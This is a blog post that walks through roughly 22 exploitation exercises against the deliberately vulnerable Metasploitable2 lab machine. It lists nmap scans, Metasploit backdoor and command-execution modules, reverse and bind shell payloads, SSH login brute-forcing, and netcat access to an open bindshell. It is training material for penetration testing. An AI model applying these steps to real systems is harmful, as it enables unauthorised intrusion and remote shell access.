To exploit vulnerability associated in metasploitable2.

-

Metasploit .vul  :-1

 FTP vsftpd 2.3.4

 Backdoor command vulnerability

 

Steps:

        Scan the network using nmap. Nmap –v –A –T4 192.168.5.235



Now open your metasploit framework and search vsftpd


  Now use exploit/unix/ftp/vsftpd_234_backdoor.and exploit it



       Now search shell_to_meterpreter. Use /multi/manage/shell_to_meterpreter.






Now interact both sessions.

 Now run the basic commands. 






Metasploit .vul :-2

 

     TCP-22 SSH

     Open SSH 4.7p1 Debian 8unbuntu1 (protocol2.0)

     Steps:-  


  Scan the network using nmap. Nmap –sV 192.168.5.237


  Open Metasploit and Search for the auxiliary for SSH Login. Command will be “search ssh_login”

   Use the appropriate auxiliary module by typing command “Use 0” and Set the IP of victim machine as RHOSTS global variable by typing command “set rhosts 192.168.5.237”

 

For setting the options, type “options” for finding out required field and Set the path of username and password file to USERPASS_FILE option. Also set STOP_ON_SUCCESS and VERBOSE as true. Set the THREADS to 10.

 


  After running the exploit, MSF will brute force login and will stop attack after finding valid combination.



   Now start sessions “sessions –I 1” and now shell is opened so use shell commands.





 PRACTICAL-3

Port Number: TCP-23

Service: Telnet

Vulnerability name: Linuxtelnetd

Steps 

 Scan the network for finding the vulnerabilities.

Nmap –v –A –T4 192.168.5.235



Now type telnet 192.168.5.235


Now open Wireshark and check the packet


   Now right click on selected packet and follow the tcp stream.



 

 

 

 

Metasploit .vul  :-4

 

Port Number: TCP-1099

Service: TCP-1099 java-rmi

Vulnerability name: GNU Class path grmiregistry

Steps

 Scan the network using nmap. Nmap –sV 192.168.60.139


 Now use exploit (multi/misc/java_rmi_server) and check options.



Now set RHOST.




 Set URI Path as Root and show options.


 
                                  

 Show targets. And use relevant target here mostly use generic.




 Set default payload.


                                                   
Now exploit it and use.


 

 

 

 

Metasploit .vul:- 5

 

 port 8180 and Tomcat service

steps


scan the nmap result 

1.                                                                                                          


                                                          
Find tomcat service port




Type command- search tomcat and search for the login module 



Now search for the options by the command – show options 



 Now set the rhosts, rport, and set stop_on_success as true



                                                        

 After we enter run, check the successful 


        

Now, search for tomcat_mgr that is a tomcat manager


  

 Now, exploit the tomcat



     As we have exploited and entered into the meterpreter. We can run the commands like sysinfo to know the information of the system.


 Now, we have entered into the shell by the command shell, so we can view the directories by ls



 

 

 

 

Metasploit .vul :-6


port 53/tcp open domain ISC BIND 9.4.2

steps 


scan nmap result.


          

Search  bailiwicked_domain and use spoof/dns/bailiwicked_domain.


                                                             

Go to wireshark and eth0 .

                                                                

Open dns packet 


 

 

Metasploit .vul :-7

 

Port :- 6667 IRC server

 

                                          

Go to Metasploit and search unreal_ircd .

                                         

Use unix/irc/unreal_ircd_3281_backdoor


                                                                   

Use payload :- 0,2

                                                                 

Cmd/unix/bind_perl

                                                                 

Cmd/unix/bind_ruby



 

 

 

 

 

Metasploit .vul :- 8

Port :- 139  netbios-ssn

Samba usermap script vulnerability                                                                                

                                                

Go to Metasploit  and search usermap_script 

                                                      

Use multi/samba/usermap_script




                                              


                                                 

Use payload :- no use ,18 ,

                                                         

cmd/unix/reverse




 

 

 

 

Metasploit .vul :- 9

 

Port :- 3632 distccd

                            

Search distcc_exec and use unix/misc/distcc_exec

                                                       
 Use payload :- 5

                                                              
cmd/unix/reverse



 

 

Metasploit .vul :-10 

PHP up to versions 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability 

port :- 80

steps

Go to browser and check php configuration file path .


                                                                 

Go to msf .

                                 

Search php_cgi_arg and use multi/http/php_cgi_arg_injection.



 

 

 

 

 








Metasploit .vul :-11

 

Port :-80 

TWiki history TWikiUsers rev Parameter command execution 

steps 


Search twiki_history and use unix/webapp/twiki_history


                                                

Use payload “cmd/unix/bind_perl”





Metasploit .vul :- 12

 

Port :- 445

samba is running on both port 139 and 445 , we will be exploiting it using Metasploit . The default port for this exploit is set to port 139 but it can be changed to port 445 as well .





 

 

 

Metasploit .vul :- 13

 

Port :- 5432

Got to msf  ,search postgres_payload and use linux/postgres/postgres_payload .

Set   RHOSTS,

LHOST= linux <IP>





Metasploit .vul :- 14


port 6667 has the Unreal IRCD service running , we will exploit is using a backdoor that's available in Metasploit .

 

 

Port :- 6667

 

Search unreal_ircd and use unix/irc/unreal_ircd_3281_backdoor .

Set payload :- 2,5

Cmd/unix/bind_perl

Cmd/unix/reverse







 

 

 

 

Metasploit .vul :- 15

 

Port :-6697

                     

 Search unreal_ircd and use  unix/irc/unreal_ircd_3281_backdoor .

                                                           

Set payload “cmd/unix/reverse”




 

 

 

 

 

Metasploit .vul :- 16

 

 

Port :- 5900

This module will test a VMC server on a range of machines and report successful logins. Currently, it supports RCB protocol version 3.3, 3.7 and  3.8 using the VNC challenge-response authentication mothod .


steps 

search vnc_login use scanner/vnc/vnc_login.




Let's put what we've found to the test by connecting using the vncviewer
Command  "vncvirwer Metasploit<IP>"
password=password





 

 

 

Metasploit .vul :-17

 

Port :- 1524

Metasploitable 2 comes with an open bindshell service running on port 1524. We will be using Netcat toconnect to it


steps 

go to msf and enter command "nc<Metasploit IP> 1524"




 

 

 

 

 

Metasploit .vul :- 18

Port :- 2121  ,  proFTPD

telnet <Taget IP Address> <Port Number>

USER <username>
PASS <password>



 

 

 

 

Metasploit .vul :- 19

 

 Port :-3306 , MySQL …

Set command and enter .

No passwd so direct press enter ….





Metasploit .vul :- 20

 

Prot :- 25 ,SMTP

 

Search smtp_enum and use scanner/smtp/smtp_enum .


Open second terminal.


Smtp commands .



 

 

Metasploit .vul :- 21

 

Remote shell exploitation

 

Port:- 514 

 

Install rsh-client


 


Enter command “rsh <ip>”




 

 

Metasploit .vul :- 22

Port :- 513 , rlogin



 

Location: India

Comments

Post a Comment

Popular posts from this blog

How to Installing and setup GoPhish on Kali Linux

-
Image
  How to Installing and setup GoPhish on Kali Linux Gophish is an open-source phishing toolkit designed for security professionals to conduct penetration tests and awareness training. Developed with user-friendliness in mind, Gophish allows users to easily create, launch, and manage phishing simulation campaigns. It provides a web-based interface where users can design customizable email templates, landing pages, and email lists. Gophish’s real-time reporting and analytics capabilities enable detailed tracking of campaign metrics such as email open rates, link clicks, and submitted credentials, helping organizations assess their vulnerability to phishing attacks. Its flexibility and ease of integration make it a valuable tool for enhancing cybersecurity awareness and testing organizational defenses against social engineering threats. The tool supports various deployment environments, ensuring adaptability to different IT infrastructures. Gophish's comprehensive features make it
Read more

Search engines for cybersecurity research ( part -1 )

-
Image
  In the ever-evolving landscape of cybersecurity, staying ahead of emerging threats and vulnerabilities is crucial. Information security professionals, researchers, and enthusiasts constantly seek the latest insights, tools, and resources to fortify digital defenses. One invaluable weapon in this ongoing battle is the vast realm of search engines tailored specifically for cybersecurity research.   Cybersecurity research has grown into a multidisciplinary field, encompassing everything from threat intelligence and vulnerability analysis to incident response and ethical hacking. To navigate this intricate terrain effectively, researchers rely on specialized search engines that go beyond the surface-level results of conventional search queries. These dedicated tools are engineered to unearth the hidden gems within the vast sea of digital information, making them indispensable for anyone committed to securing the digital realm.   This blog aims to shed light on the diverse array o
Read more

Malware analysis tools

-
Image
  Best malware analysis tools and their features. Malware has become a huge threat to organizations across the globe. Something as simple as opening an email attachment can end up costing a company millions of dollars if the appropriate controls are not in place. Thankfully, there are a plethora of malware analysis tools to help curb these cyber threats. When responding to a security incident involving malware, a digital forensics or research team will typically gather and analyze a sample to better understand its capabilities and guide their investigation. There are a number of tools that can help security analysts reverse engineer malware samples. The good news is that a few malware analysis tools are completely free and open source.  1.peStudio This is an excellent tool for conducting an initial triage of a malware sample and allows me to quickly pull out any suspicious artifacts. Once a binary has been loaded it will quickly provide the user with hashes of the malware and any
Read more